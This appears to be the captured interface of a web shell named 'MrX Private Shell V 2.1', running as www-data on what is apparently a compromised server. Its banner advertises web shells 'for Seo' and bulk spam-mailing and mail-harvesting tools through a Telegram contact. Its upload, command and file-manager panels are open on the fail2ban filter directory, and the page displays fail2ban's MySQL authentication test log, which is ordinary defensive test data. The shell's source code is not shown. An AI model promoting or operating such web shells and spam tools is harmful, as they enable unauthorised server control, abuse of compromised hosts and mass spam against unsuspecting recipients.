__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# failJSON: { "time": "2013-03-24T00:04:00", "match": true , "host": "192.168.1.35" }
130324  0:04:00 [Warning] Access denied for user 'root'@'192.168.1.35' (using password: NO)
# failJSON: { "time": "2013-03-24T08:24:09", "match": true , "host": "220.95.238.171" }
130324  8:24:09 [Warning] Access denied for user 'root'@'220.95.238.171' (using password: NO)
# failJSON: { "time": "2013-03-24T17:56:13", "match": true , "host": "61.160.223.112" }
130324 17:56:13 [Warning] Access denied for user 'root'@'61.160.223.112' (using password: NO)
# failJSON: { "time": "2013-03-24T17:56:14", "match": true , "host": "61.160.223.112" }
130324 17:56:14 [Warning] Access denied for user 'root'@'61.160.223.112' (using password: YES)
# failJSON: { "time": "2013-03-24T19:01:39", "match": true , "host": "61.147.108.35" }
130324 19:01:39 [Warning] Access denied for user 'root'@'61.147.108.35' (using password: NO)
# failJSON: { "time": "2013-03-24T19:01:40", "match": true , "host": "61.147.108.35" }
130324 19:01:40 [Warning] Access denied for user 'root'@'61.147.108.35' (using password: YES)
# failJSON: { "time": "2004-09-16T21:30:26", "match": true , "host": "74.207.241.159" }
Sep 16 21:30:26 catinthehat mysqld: 130916 21:30:26 [Warning] Access denied for user 'hacker'@'74.207.241.159' (using password: YES)
# failJSON: { "time": "2004-09-16T21:30:32", "match": true , "host": "74.207.241.159" }
Sep 16 21:30:32 catinthehat mysqld: 130916 21:30:32 [Warning] Access denied for user 'hacker'@'74.207.241.159' (using password: NO)

# failJSON: { "time": "2015-10-07T06:09:42", "match": true , "host": "127.0.0.1", "desc": "mysql 5.6 log format" }
2015-10-07 06:09:42 5907 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)
# failJSON: { "time": "2015-10-07T08:25:38", "match": true , "host": "192.0.2.1", "desc": "log format with extra space between the date and time stamps, gh-1639" }
2015-10-07  8:25:38 139845235329792 [Warning] Access denied for user 'user'@'192.0.2.1' (using password: YES)

# failJSON: { "time": "2016-02-24T15:26:18", "match": true , "host": "localhost", "desc": "mysql 5.6 log format, Note instead of Warning" }
2016-02-24T15:26:18.237955 6 [Note] Access denied for user 'root'@'localhost' (using password: YES)

# failJSON: { "time": "2016-02-24T15:26:18", "match": false , "host": "localhost", "desc": "A hypothetical example of injection having full log line first (for paranoid yoh)" }
2016-02-24T15:26:18.237955 6 [Note] Access denied for user 'root'@'localhost' (using password: YES) condition lead to a hypothetical failure

# failJSON: { "time": "2019-01-03T09:50:04", "match": true , "host": "192.0.2.1", "desc": "mysql 8.0.13 logging with details, (log-error-verbosity = 3, gh-2314)" }
2019-01-03T08:50:04.634875Z 113 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.0.2.1' (using password: NO)

# failJSON: { "time": "2019-09-06T01:45:18", "match": true , "host": "192.0.2.2", "desc": "ISO timestamp within log message" }
2019-09-06T01:45:18 srv mysqld: 2019-09-06  1:45:18 140581192722176 [Warning] Access denied for user 'global'@'192.0.2.2' (using password: YES)
# failJSON: { "time": "2019-09-24T13:16:50", "match": true , "host": "192.0.2.3", "desc": "ISO timestamp within log message" }
2019-09-24T13:16:50 srv mysqld[1234]: 2019-09-24 13:16:50 8756 [Warning] Access denied for user 'root'@'192.0.2.3' (using password: YES)

# filterOptions: [{"logtype": "file"}, {"logtype": "short"}, {"logtype": "journal"}]
# failJSON: { "match": true , "host": "192.0.2.1", "user":"root", "desc": "mariadb 10.4 log format, gh-2611" }
2020-01-16 21:34:14 4644 [Warning] Access denied for user 'root'@'192.0.2.1' (using password: YES)

Filemanager

Name Type Size Permission Actions
bsd Folder 0755
3proxy File 575 B 0644
apache-auth File 12.5 KB 0644
apache-badbots File 688 B 0644
apache-botsearch File 3.66 KB 0644
apache-fakegooglebot File 480 B 0644
apache-modsecurity File 2.59 KB 0644
apache-nohome File 406 B 0644
apache-noscript File 2.64 KB 0644
apache-overflows File 2.7 KB 0644
apache-pass File 273 B 0644
apache-shellshock File 499 B 0644
assp File 5.09 KB 0644
asterisk File 13.64 KB 0644
bitwarden File 741 B 0644
centreon File 252 B 0644
counter-strike File 399 B 0644
courier-auth File 1.04 KB 0644
courier-smtp File 1.69 KB 0644
cyrus-imap File 2.4 KB 0644
directadmin File 835 B 0644
domino-smtp File 1.26 KB 0644
dovecot File 16.25 KB 0644
dropbear File 1.3 KB 0644
drupal-auth File 2.31 KB 0644
ejabberd-auth File 1.46 KB 0644
exim File 10.2 KB 0644
exim-spam File 3.38 KB 0644
freeswitch File 2.33 KB 0644
froxlor-auth File 354 B 0644
gitlab File 392 B 0644
grafana File 564 B 0644
groupoffice File 309 B 0644
gssftpd File 176 B 0644
guacamole File 1016 B 0644
haproxy-http-auth File 943 B 0644
horde File 567 B 0644
kerio File 3.23 KB 0644
lighttpd-auth File 1.36 KB 0644
mongodb-auth File 2 KB 0644
monit File 2.35 KB 0644
monitorix File 863 B 0644
mssql-auth File 1.26 KB 0644
murmur File 702 B 0644
mysqld-auth File 3.61 KB 0644
nagios File 226 B 0644
named-refused File 3.22 KB 0644
nginx-bad-request File 1.37 KB 0644
nginx-botsearch File 2.64 KB 0644
nginx-http-auth File 3.6 KB 0644
nginx-limit-req File 1.14 KB 0644
nsd File 648 B 0644
openhab File 692 B 0644
openwebmail File 615 B 0644
oracleims File 1.8 KB 0644
pam-generic File 2.37 KB 0644
perdition File 589 B 0644
php-url-fopen File 314 B 0644
phpmyadmin-syslog File 177 B 0644
portsentry File 341 B 0644
postfix File 15.87 KB 0644
proftpd File 2.88 KB 0644
pure-ftpd File 195 B 0644
qmail File 830 B 0644
recidive File 1.38 KB 0644
roundcube-auth File 5.42 KB 0644
scanlogd File 854 B 0644
screensharingd File 1.09 KB 0644
selinux-ssh File 3.36 KB 0644
sendmail-auth File 3.84 KB 0644
sendmail-reject File 10.83 KB 0644
sieve File 535 B 0644
slapd File 1.12 KB 0644
softethervpn File 648 B 0644
sogo-auth File 3.47 KB 0644
solid-pop3d File 1.59 KB 0644
squid File 895 B 0644
squirrelmail File 197 B 0644
sshd File 33.6 KB 0644
sshd-journal File 23.82 KB 0644
stunnel File 267 B 0644
suhosin File 1.26 KB 0644
tine20 File 520 B 0644
traefik-auth File 1.81 KB 0644
uwimap-auth File 1.51 KB 0644
vsftpd File 1.1 KB 0644
webmin-auth File 640 B 0644
wuftpd File 631 B 0644
xinetd-fail File 331 B 0644
znc-adminlog File 708 B 0644
zoneminder File 715 B 0644
zzz-generic-example File 4.15 KB 0644
zzz-sshd-obsolete-multiline File 36 B 0644
Filemanager